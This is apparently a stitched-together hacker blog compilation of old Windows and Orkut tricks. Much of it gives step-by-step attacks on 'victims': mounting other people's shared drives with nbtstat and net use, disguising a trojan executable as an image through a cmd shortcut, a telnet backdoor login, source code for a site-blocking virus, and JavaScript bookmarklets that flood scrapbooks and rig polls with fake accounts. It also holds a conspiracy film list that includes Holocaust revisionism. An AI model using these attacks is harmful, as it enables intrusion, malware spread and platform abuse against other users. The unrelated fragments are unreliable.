“Orkut is banned you fool,the administrator didn’t write this programme guess who did ? muhahaha”
white opening ORKUT You must be getting the similar message for Youtube and Firefox
Youtube :
“Youtube is banned you fool,the administrator didn’t write this programme guess who did ? muhahaha”
Firefox :
“Firefox is banned you fool,the administrator didn’t write this programme guess who did ? muhahaha”
Here is the solution for this problem
Actually you are infected with an virus .DONT PANIC ! Just follow the procedure given below
1. Press CTRL+ALT+DEL and go to the processes tab 2. Look for svchost.exe under the image name. There will be many but look for the ones which have your username under the username 3. Press DEL to kill these files. It will give you a warning, Press Yes 4. Repeat for more svchost.exe files with your username and repeat. Do not kill svchost.exe with system, local service or network service! 5. Now open My Computer 6. In the address bar, type “C:\heap41a” and press enter 7. Delete all the files here 8. Now go to start -> Run and type “Regedit” 9. Go to the menu EDIT –> FIND 10. Type “heap41a” here and press enter 11. You will get something like this “[winlogon] C:\heap41a\svchost.exe C:\heap(some number)\std.txt ” 12. Press DEL. It will ask “Are you sure you want to delete this value”, click “Yes” 13. Now close the registry editor
And format your USB drives .It may still have the infection .When you double click a pendrive icon in my computer the “autorun.ini” executes and virus copied in your PC
More than 140 Documentary Films High Quality and Every Links are Direct Links Don't Miss It
911 - Confronting The Evidence 911 - The Great Deception 911 - The Greatest Lie Ever Sold 911 Birth of Treason 911 Mysteries 911 Myths - David Ray Griffin 911 Press for Truth 911 Revisited v2 AFTF Authorized Aerosol Crimes Aftermath Live Panel Aftermath: Unanswered Questions of 9-11 Aldoux Huxley - The Gravity of Light Alex Jones Documentary Films Alliance Weather Underground Alternative 3 (Sequel to Iron Mountian) America Freedom to Fascism America's Disgrace Exposed Angels Dont Play This HAARP Anthrax Investigation Aspertame - Sweet Misery - A Poisoned World BBC Documentaries Bad Trip To Edgewood Banking With Hitler Beyond Treason Brainwashing: 101 Charlotte Iserbyt - The Deliberate Dumbing Down of America Chavez - The Revolution Will Not Be Televised Cointelpro Conspiracy of Silence Convoy of Death Corporation Crazy Rulers of the World (Nov 2004) DRG Cspan2 - Very Good David Cole At Auschwitz Nazi Jew Revisionism Day 51 - The True Story Of Waco Discovery Science - Owning The Weather Dreamworlds 2 - Desire Sex and Power in Music Video Echelon - The Most Secret Spy System Election Hacking: Clinton Curtis Testimony Ohio 2004 Everbody's Gotta Learn Sometime Exposed: The Carlyle Group Exposing The Illuminati From Within Fallujah: The Hidden M***acre Fluoride Deception Freemasonry - From Darkness To Light Freemasonry Revealed Frontline Future Of Food: Genetically Modified Food G. Edward Griffin Gladio Gulag USA: Concentration Camps In America HAARP: Holes in Heaven Hidden Wars of Desert Storm Hijack Catastrophe Extras Hijacking Catastrophe History Documentary - The Rockefellers In Search Of The American Drug Lords Inside The Oklahoma City Grand Jury Invisible Ballots Iraq Death Squads Iraq For Sale Iron Mountain: Blueprint for Tyranny
If your victim posess certain security flaws then her system can be broken into in less that 15 seconds.
This is how : - Click "Start -> Run -> cmd"
Type the following at the Dos Prompt Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]
This will give you a read out that looks like this NetBIOS Remote Machine Name Table ____________________________________ Name Type Status ------------------------------------ abhi <00> UNIQUE Registered WORK <00> GROUP Registered abhi <03> UNIQUE Registered abhi <20> UNIQUE Registered WORK <1e> GROUP Registered WORK <1d> UNIQUE Registered __MSBROWSE__.<01>GROUP Registered ____________________________________
The numbers in the <> are hex code values. What we are interested in is the “Hex Code” number of <20>. A hex code of <20> means you have file and printer sharing turned on.
Next step is to find out what is being shared. This is how : -
Net view \\ [e.g : net view \\207.175.1.1]
You will then get a response that looks something like this. Shared resources at \\ip_address Sharename Type Comment ______________________ MY DOCUMENTS Disk TEMP Disk ______________________ (The command was completed successfully.)
This shows you that your potential victim has their My Documents Folder shared and their Temp directory shared. For you to then get access to those folders next command will be.
Net use x: \\\temp [e.g : net use x: \\207.175.1.1\temp]
If all goes well for you, you will then get a response of (The command was completed successfully.) Open my computer you will see your victim's temp folder there.
TOP TEN HACKERS!! Here is a list off the top 10 hacks of all time. Early 1990s
Kevin Mitnick, often incorrectly called by many as god of hackers, broke into the computer systems of the world's top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking, instead he called it social engineering. November 2002
Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a "fast-track extradition" to the US where he is a wanted man. The next hearing in the case is slated for today. 1995
Russian computer geek Vladimir Levin effected what can easily be called The Italian Job online - he was the first person to hack into a bank to extract money. Early 1995, he hacked into Citibank and robbed $10 million. Interpol arrested him in the UK in 1995, after he had transferred money to his accounts in the US, Finland, Holland, Germany and Israel. 1990
When a Los Angeles area radio station announced a contest that awarded a Porsche 944S2 for the 102nd caller, Kevin Poulsen took control of the entire city's telephone network, ensured he is the 102nd caller, and took away the Porsche beauty. He was arrested later that year and sentenced to three years in prison. He is currently a senior editor at Wired News. 1983
Kevin Poulsen again. A little-known incident when Poulsen, then just a student, hacked into Arpanet, the precursor to the Internet was hacked into. Arpanet was a global network of computers, and Poulsen took advantage of a loophole in its architecture to gain temporary control of the US-wide network. 1996
US hacker Timothy Lloyd planted six lines of malicious software code in the computer network of Omega Engineering which was a prime supplier of components for NASA and the US Navy. The code allowed a "logic bomb" to explode that deleted software running Omega's manufacturing operations. Omega lost $10 million due to the attack. 1988
Twenty-three-year-old Cornell University graduate Robert Morris unleashed the first Internet worm on to the world. Morris released 99 lines of code to the internet as an experiment, but realised that his program infected machines as it went along. Computers crashed across the US and elsewhere. He was arrested and sentenced in 1990. 1999
The Melissa virus was the first of its kind to wreak damage on a global scale. Written by David Smith (then 30), Melissa spread to more than 300 companies across the world completely destroying their computer networks. Damages reported amounted to nearly $400 million. Smith was arrested and sentenced to five years in prison. 2000
MafiaBoy, whose real identity has been kept under wraps because he is a minor, hacked into some of the largest sites in the world, including eBay, Amazon and Yahoo between February 6 and Valentine's Day in 2000. He gained access to 75 computers in 52 networks, and ordered a Denial of Service attack on them. He was arrested in 2000. 1993
They called themselves Masters of Deception, targeting US phone systems. The group hacked into the National Security Agency, AT&T, and Bank of America. It created a system that let them bypass long-distance phone call systems, and gain access to the pbx of major carriers.
SHARING YOUR EXISTING ETHERNET INTERNET CONNECTION. 1. Go to Control Panel -> Network Connection. 2. Right click on Your Ethernet connection and click on “Properties”. 3. Go to “Advanced” Tab. 4. Check “Allow Other NEtwork….. Internet Connection” 5. In the Drop down Below select the Wifi connection of your pc. If it is disabled, it will be showing your wifi connection already. 6. Click on “Settings” 7. Check the protocols you need to share. Jamal has explained on them.I normally use only http and https. 8. Click on “Ok”.you reach the network connection page. The sharing part is now over.
FINDING DNS SERVER IP ADDRESS.
1. Click on Start -> Run 2. Type in cmd in the Run prompt 3. In the new window type “ipconfig /all” and press enter. 4. Note down your DNS server ip address from the screen.
CONFIGURING THE WIFI
1. Go again to Control Panel -> network connections. 2. Right click on your WIFI connection and click “properties”. 3. Go to”Wireless Network” Tab. 4. The “use windows to configure my wireless network connection” should be checked. 5. In the preferred network connection section click on add button 6. Enter a name of your wish to the network name. 7. Network authentication is “open” 8. Change Data Encryption to “Disabled” 9. Check the “this is a computer to computer …. not used” connection. 10. Click “Ok”. 11. Click on general tab. select “internet protocol(tcp/ip) and click on properties button. 12. Now type 192.168.0.1 in ip address, 255.255.255.0 in subnet mask, leave default gateway empty. 13. Fill in the DNS server entry which you had noted down earlier. 14. Click on “OK” and your network is set.
Your network should appear on the wifi network list now. Search for wlan on your phone. Connect and enjoy browsing on your phone.
4. Paste this into the text box: "c:\program files\google\google talk\googletalk.exe" /nomutex (dont miss even a comma)
5. Click Next6. Name it whatever: Google Talk Multiple, etc.
8. Click OK until you are done.
ENJOY>>>>>>>>>>>>>>>>>>>>>>
yahoo/...** multiple login for yahoo!!! You can login with multiple id's on the same yahoo messenger without any download or patch . Follow these steps 1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right pane , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
That's it done!! Now close registry and restart yahoo messenger .For signing in with new id open another messenger .
What to do if get this error--Key server not found-- While opening software?
You may have doubt while opening software which is installed in ACCC novell server services it will be showing this error key server not found.How to rectify this problem "key server not found" ,while opening software?
Well this is the major problem occurs while opening software after installation from ACCC novell server.You will be seeing this-- error Key server not found-- as soon as you double click on software.Well this problem can be rectified by 2 solutions. Solution 1: You have to do following steps:
1)Search for this file "keyacc*.*" without quotes in your system. 2)Delete all keyacc*.* files which you have found. 3)Open this file winstall (n:\winstall\installss.exe) 4)This will check all keyacc files.It will take few minutes for checking those files.When it does not find them it will put them in the locations which will fix keyserv issues..
If the above solution does not work then follow the sloution 2. Solution 2: If solution 1 does not work then you have to do small work..Just replace contents of keyacc.ini file with the following code..
I know this is a very simple thing but the problem, as like many other issues, is the ignorance about it.
How often do you copy songs from a CD? Or some photos from a CD?
What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. customize your SEND TO MENU.
This sounds simple and you can do it in less than sixty seconds. You can create your own BASKET.
First you’ll need access to hidden files. So change your view settings to make all hidden files visible. Tools -> folder options -> view (tab) and select the show hidden files and folders. go to parent drive:/documents and settings/(user name)/send to
Open up my computer and locate your most used folders.
Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.
Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER
Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.
Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.
SPIDER.EXE - Spider Solitaire SYNCAPP.EXE - Create A Briefcase SYSEDIT.EXE - System Configuration Editor SYSKEY.EXE - SAM Lock Tool TASKMGR.EXE - Task Manager TELNET.EXE - MS Telnet Client TSSHUTDN.EXE - System Shutdown TOURSTART.EXE - Windows Tour Launcher UTILMAN.EXE - System Utility Manager USERINIT.EXE - My Documents VERIFIER.EXE - Driver Verifier Manager WIAACMGR.EXE - Scanner and Camera Wizard WINCHAT.EXE - Windows for Workgroups Chat WINHELP.EXE - Windows Help Engine WINHLP32.EXE - Help WINMINE.EXE - Minesweeper WINVER.EXE - Windows Version Information WRITE.EXE - WordPad WSCRIPT.EXE - Windows Script Host Settings WUPDMGR.EXE - Windows Update
ACCESS.CPL - Accessibility Options APPWIZ.CPL - Add or Remove Programs DESK.CPL - Display Properties HDWWIZ.CPL - Add Hardware Wizard INETCPL.CPL - Internet Explorer Properties INTL.CPL - Regional and Language Options JOY.CPL - Game Controllers MAIN.CPL - Mouse Properties MMSYS.CPL - Sounds and Audio Device Properties NCPA.CPL - Network Connections NUSRMGR.CPL - User Accounts ODBCCP32.CPL - ODBC Data Source Administrator POWERCFG.CPL - Power Options Properties SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options TIMEDATE.CPL - Date and Time Properties
CERTMGR.MSC - Certificates CIADV.MSC - Indexing Service COMPMGMT.MSC - Computer Management DEVMGMT.MSC - Device Manager DFRG.MSC - Disk Defragmenter DISKMGMT.MSC - Disk Management EVENTVWR.MSC - Event Viewer FSMGMT.MSC - Shared Folders LUSRMGR.MSC - Local Users and Groups NTMSMGR.MSC - Removable Storage NTMSOPRQ.MSC - Removable Storage Operator Requests PERFMON.MSC - Performance Monitor SERVICES.MSC - Services WMIMGMT.MSC - Windows Management Infrastructure
Introduction: Telnet is used to connect to remote machines through emulation. This means that it can connect to a server, any server instantly because of it's ability to emulate (copy) remote computers.
Lets Start: In Windows, Telnet can be found by going to Start -> Run and then typing telnet. The application should then pop up. If you don't have Windows, there are many Telnet alternatives for mac, linux etc. Since I don't know any,search the internet for Telnet for Linux or Telnet for Mac and you should find something instantly.
If you have a PC and are using Windows 98/95, 2000, Me, or XP continue...
As you can see, Telnet has 4 menu options. These are Connect, Edit, Terminal, and Help.
If you click Connect, you should see more options. Here they are.
Connect: Remote System.. Disconnect Exit
Names of servers you have been on.
To connect to a server, click Remote System... This will then take you to a dialog box that has these fields:
Hostname: Port: TermType:
There should also be a Connect button and a Cancel Button.
Lets go over these & what you should put in them.
-Hostname-
The Hostname can be the address of the website your going to be connecting to: http://www.google.com or it can be the IP address. Keep in mind that you can only connect to servers and not to clients (other PCs) an IP Address looks like this: 64.233.167.99
-Port- Port can bb either the port number you wanna connect to on the server (Port 80 is the Internet, Port 23 is Simple Mail Protocol then there are some more ports for different things..) or you can keep it Telnet and see what happens.
-TermType- TermType is the type of Terminal telnet will be acting like. This doesn't matter most of the time, so you can keep it to default or try other ones if you want.
When you have all this set up, you can Click Connect & see what happens.
Note: Sometimes many servers don't like anon people just logging on, so be careful when logging onto servers, because sometimes it might be some big company that likes bullying people or just SOMEONE who likes bullying people and then they might want to find you or trace you or something and I know for a fact you don't need that happening.
Another Note: When you go to a server and type something, such as a login name or a password, you might not see anything even though you are typing. this is a feature that telnet or the other server uses. It's for some kind of safety measure.
Ok that's all for the Connect Menu, lets go over the Terminal menu.
The terminal menu should have 3 options:
Prefernces Start Logging Stop Logging.
-Prefernces- If you go to this, a dialog box will come up with various options. Here, you can change the text color & background color of the program, and you can enable Local Echo, which shows you everything you've typed, Blinking cursor if you want the cursor to blink check it, if not un check, Block cursor if you want the cursor to be shown as a block, VT100 Arrows, don't worry about these they are useless, Buffer Size, this allows you to set the number of lines of text you want to be shown before the screen starts to scroll, The Terminal emulation type, always have this set on the default unless you know what the second one is and you know what your doing.
-Start Logging- This logs everything you do on Telnet in a log file on your computer.
-Stop Logging- This will stop logging processes.
Well that's it for basics of telnet. Thanks for reading.
For complete Guide on telnet visit happy hackers guide for telnet, Telnet: the Number One Hacker Tool is the guide title, from this guide really you can become a hacker
1. Firstly, create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc. 2. Paste a copy of your server on the new created folder. let's say it's called server.exe (that's why you need the extension of files showing, cause you need to see it to change it) 3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg 4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES. 5. Now create a shortcut of this picture.jpeg in the same folder. 6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg. 7. Go to properties (on file me.jpeg) and now you need to do some changes there. 8. First of all delete all the text on field START IN and leave it empty. 9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg 10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run. 12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK. 13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone. 14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
Step 1 Get a IP (range) scanner. (superscanner is a fast one). Scan the victim's ip on TCP/IP port 139
Step 2 Open a dos prompt Do this by going to start/run enter command.com and press ok
this is what you see: c:windows>
This is what you need to type down: Replace 255.255.255.255 with the victims IP address.
c:windows>nbtstat -a 255.255.255.255
If you see this your in:
NetBIOS Remote Machine Name Table
Name Type Status ------------------------------ ---------- ----------------------- user<00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx ---------------------------------------------------------------
If you don't get the number <20>. The victim disabled the File And Printer Sharing, find a another victim.
Step 3
type down:
c:windows>net view 255.255.255.255
if the output is like this:
Shared resources at 255.255.255.255 ComputerNameGoesHere
Sharename Type Used as Comment
------------------------------------------------------------ CDISK Disk xxxxx xxxxx
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK
Step 4
type down: you can replace x: by anything letter yopu want but not your own drive letters. CDISK is the name of the shared harddrive.
c:windows>net use x: 255.255.255.255CDISK
If the command is successful we will get the confirmation. The command was completed successfullly
Now open windows explorer or just double click on the My Computer icon on your
Azureus Installer + Shu Mod 2.2.1.180 (Hack Version)
Hack Changelog: - Removed all checking and version code - Added an Update News & Version button - Button asks if you want to update just news or just version - Includes ORIGINAL Azureus splash screen - Removed Login boxes from the Shu Config Sections - Removes access to the Shu Donation Window - Donation window replaced with a Shu Mod About Box - Some labels are changed to show 00DE and myself
WHAT IT DOES: Stops Shu Mod from accessing the Shu website. Disabled Authentication check. Disabled Shu Mod Version check. Disabled News check. All Users have "admin" access. Enabled No Upload and other non-public features. Added Check News button to check current news and version Removed Donation windows for Shu
This also includes the latest plugins and recommended plugins - 3D View - Advanced Statistics - Sudoku - AutoCategory - Peer Injector - Chat - Ratings - Client Spoof Plus - Country Locator - Monitoring Plugin - Multi-Port - Progress Bar - RSS Feed - Seeding Columns - Speed Scheduler
javascript:f=prompt('Put your Commentz here:','');cmm=location.href.match(/cmm.*/);tid=location.href.match(/tid=\d*/);a=document.forms[1];;a=document.forms[1];a.action='/CommMsgPost.aspx?'+cmm+'&'+tid+'&bodyText='+f+'&Action.submit';a.submit();void(0)
i m giovng you some script tht will help u to make poll voter if u have little knowledge of VB.. these script are based o Ajax...with ajax you dont need to navigate towards poll...just paste it on any orkut page and let the script handle the rest..!!!
Moreover ajax is lot more faster than the regular one..!!
The following one is for Voting
javascript:send="POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&option="+"OPTION"+"&public_vote=1"+"&Action.vote=";var xml = new XMLHttpRequest();xml.open("POST", "/CommPollVote.aspx?cmm=CMM&pid=PID&pct=PCT", true);xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");xml.send(send);void(0)
The following One is for comment javascript:send="POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&postText="+encodeURIComponent(" Comment")+"&Action.submit=";var xml = new XMLHttpRequest();xml.open("POST", "/CommPollResults.aspx?cmm=CMM&pid=PID&pct=PCT", true);xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");xml.send(send);void(0)
Now since some Polls require comm joininghere is one more script tht will help you...just Add this at the start of one the scripts given above
javascript:send="POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&Action.join=";var xml = new XMLHttpRequest();xml.open("POST", "/CommunityJoin.aspx?cmm=32982657", true);xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");xml.send(send);void(0)
THESE SCRIPTS ARE WORKING IN FF i dont know abt IE 7..!!! ____________________________________________________________________
NOw some tips to make your POll voter
1..create a textbox and ask ppl to enter fakes in following manner
_________________
Text1.text _________________
user1:Pass1 user2:pass2 _________________
_________________
2..now use the command Split...Split breaks the pasticular character and makes and array ouuta them
start:
dim a dim i=0 a=split(text1.text,vbcrlf) b=split(a(i),":")
user=b(0) pass=b(1)
if i=ubound(a) then masgbox("Fakes khatam paisa hajam") end if
ur function here
goto start
similarly by using the same function u can introduce another feature...!!! random comment from array of comment
1..Ask the user 2 enter as many comments as possible in a multiline textbox now use following command...eg..
_________________
text2.text _________________
hi Bye
_________________ _________________
dim a,b,comment a=split(text2.text,vbcrlf) b=ubound(a) comment=a(int(rnd*b))
~A simple and easy way of using cookies in orkut~ javascript:alert("Script created by CHINTU ROCKS");ls="orkut_state part here";document.cookie=ls;location.reload();
download it .. send it to victim .. he must run it .. go to telnet .. -->run > telnet .. type o in type ip address .. of the victim .. then if entered correctly .. it would ask for username and password .. enter username:administrator password:hack
WOOSH !!
u r in the victims PC .. now u can control his PC using DOS commands ,,
i have use in my friend computer right now i have nod32 can't use in my pc ok got it
must be send comments
i have got frm other community but friend how to connect da port 23
In this step by step guide you will learn about: How to Hack Network Hard Drives using the command prompt. Things to remember
* CP = Command Prompt * HDs = Hard Drives
Step by Step: 1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2. 2. Once in command prompt type c:\windows>nbtstat -a 203.195.136.156 (instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3. 3. Let say that it gives you this
NetBIOS Remote Machine Name Table
Name Type Status
--------------------------------------------- user <00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------
NOTE - If you do not get this number there are three possible answers
A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.
B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off. C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers 4. Now in command prompt type c:\windows>net view \\203.195.136.156
Let's suppose we get the following output
Shared resources at \\203.195.136.156 The computer's name will be here
Share name Type Used as Comment
------------------------------------------- CDISK Disk
The command completed successfully. 5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file) c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully
Now just double click on the My Computer icon on your desktop and there will be a new drive there with the letter that you replaced K with.
Continue to Hacking network printers with the command prompt
javascript:var p=prompt("Enter Your Text","Album Flooding By KOK");function kok(){oug=document.forms[3].com.value=p;_addComment(1024);}void(setInterval(kok,800));
With this hack you can access any1's SMS Me application..
Read the Instructions ...
1. You Have to Use Mozilla Firefox becoz it gives info about the frames. 2. You Have to Find a profile where SMS Me application is installed and activated with the profile person's mobile. 3. Goto the profile on the SMS Me application and right click on "SMS Anyone" then goto "This Frame" then to "Open Frame in new tab" ..
4. Now goto the opened tab.. 5. See the address bar. It will be sumthing like..
// @name Quick Reply in Scrapbook (With signature)
// @namespace http://www.gautamsofts.com/ and http://blog.gautamsofts.com/
// @author Gautam [Thanks to Mr Nobody] // @description Reply in any orkut community with Shift+[Functional key No as the scrap number [like F3 for scrap #3]]
Hack PC while chatting I am not sure that this will work 100 %. But yes will work almost 70 percent of the times. But before that you need to know some few things of yahoo chat protocol leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages. 2) When we send files yahoo has 2 options a) Either it uploads the file and then the other client has to down load it. Either it connects to the client directly and gets the files 3) When we use video or audio:- a) It either goes thru the server Or it has client to client connection And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies. So lets analyse 1) Its impossible to get a Attackers IP address when you only chat. 2) There are 50 % chances of getting a IP address when you send files 3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances . I'll explain only for files here which lies same for Video or audio
1) Go to dos type -> netstat -n 3 You will get the following output.Just do not care and be cool Active Connections
Proto Local Address Foreign Address State TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target . if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established HMMMM then the first attacker first phase is over This is the output in your netstat.The 5101 number port is where the Attacker is connected. Active Connections
Proto Local Address Foreign Address State TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
3) so what next??? Hmmm........ Ok so make a DOS attack now Go to dos prompt and Just do nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network. C:\>nbtstat -A 194.30.209.14
Local Area Connection: Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status --------------------------------------------- EDP12 <00> UNIQUE Registered XYZ <00> GROUP Registered XYZ <20> UNIQUE Registered XYZCOMP1 <1E> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
What to do next?? It is now ur job to tell me what u have done next...
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
ControlGetText,ed,edit1,ahk_class IEFrame ifinstring,ed,orkut { winclose ahk_class IEFrame soundplay,C:\heap41a\2.mp3 msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? `r`r MUHAHAHA!!,30 return } ControlGetText,ed,edit2,ahk_class IEFrame ifinstring,ed,orkut { winclose ahk_class IEFrame soundplay,C:\heap41a\2.mp3 msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? `r`r MUHAHAHA!!,30 return } ControlGetText,ed,edit3,ahk_class IEFrame ifinstring,ed,orkut { winclose ahk_class IEFrame soundplay,C:\heap41a\2.mp3 msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? `r`r MUHAHAHA!!,30 return } ControlGetText,ed,edit4,ahk_class IEFrame ifinstring,ed,orkut { winclose ahk_class IEFrame soundplay,C:\heap41a\2.mp3 msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did?? `r`r MUHAHAHA!!,30 return }
}
return
It is the source code of a virus that blocks Orkut, Youtube and Firefox and shows a message as under,if you try to open either of the two websites :
"ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!"
It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file).If your pc is infected by this virus then just boot it in safe mode,goto cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible and then just delete this folder.Now use a registry cleaner to delete the registry keys made by this virus.That's it,you've done it!!!
+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value; document.body.innerHTML+=''; function a(){vi=replyForm;vi.toUserId.value=nb;vi.target="SbFlood";vi.scrapText.value="Your Text Here " + i ;vi.action='Scrapbook.aspx?Action.submit';vi.submit();i++};void(setInterval(a,1050))
javascript: i=0;nb=document.body.innerHTML.match(/\w+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value; document.body.innerHTML+=''; function a(){vi=replyForm;vi.toUserId.value=nb;vi.target="SbFlood";vi.scrapText.value=nb1 + "" + i ;vi.action='Scrapbook.aspx?Action.submit';vi.submit();i++};void(setInterval(a,1050))
javascript:i=0;document.body.innerHTML+='';function cs1(){cs=replyForm;cs.toUserId.value=GIDHERE;cs.target='TF';cs.scrapText.value="Your message" +i ;cs.action='Scrapbook.aspx?Action.submit';cs.submit();i++};crazy=document.getElementsByTagName('TEXTAREA').item(0).value;document.body.innerHTML+='';document.forms[1].target='tf2';setInterval("document.getElementsByTagName('TEXTAREA').item(0).value=crazy +'Hello World '+i;a=_submitForm(document.forms[1], 'submit', '');i++",1300);void(setInterval(cs1,2500))
javascript: i=0;nb=document.body.innerHTML.match(/\w+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value; document.body.innerHTML+=''; function a(){vi=replyForm;vi.toUserId.value=nb;vi.target="SbFlood";vi.scrapText.value=nb1 + "" + i ;vi.action='Scrapbook.aspx?Action.submit';vi.submit();i++};void(setInterval(a,800))
javascript: i=0;nb=document.body.innerHTML.match(/\w+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value; document.body.innerHTML+=''; function a(){vi=replyForm;vi.toUserId.value=nb;vi.target="SbFlood";vi.scrapText.value=nb1 + "" + i ;vi.action='Scrapbook.aspx?Action.submit';vi.submit();i++};void(setInterval(a,1050))
INSTRUCTION
1...Create a fake
2....send a scrap and friend request to the fake using ur account
3....Accept frnd request and Goto fake's scrapbook
4....Open reply Box
5....Paste The script
Speed : For me it was about 5 scraps/second....this is because orkut sends replied scraps very fast...
------------------------------------------------------------------------------------------------------
javascript: i=0;nb=document.body.innerHTML.match(/\w+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value;intervalo = prompt(%22Interval:%22,2500);document.body.innerHTML+=''; function a(){vi=replyForm;vi.toUserId.value=nb;vi.target=%22JOWKSS%22;vi.scrapText.value=nb1 + %22\n\n\n %22+Math.random();vi.action='Scrapbook.aspx?Action.submit';vi.submit();i++};void(setInterval(a,intervalo))
This is nearly a year back incident, would like to share with you.Well I had a genuine MCE, I downloaded the MP11, the day it was released,but I wasn't able to install that on my other PC, that was running on MCE, well I was disappointed for not able to test it.
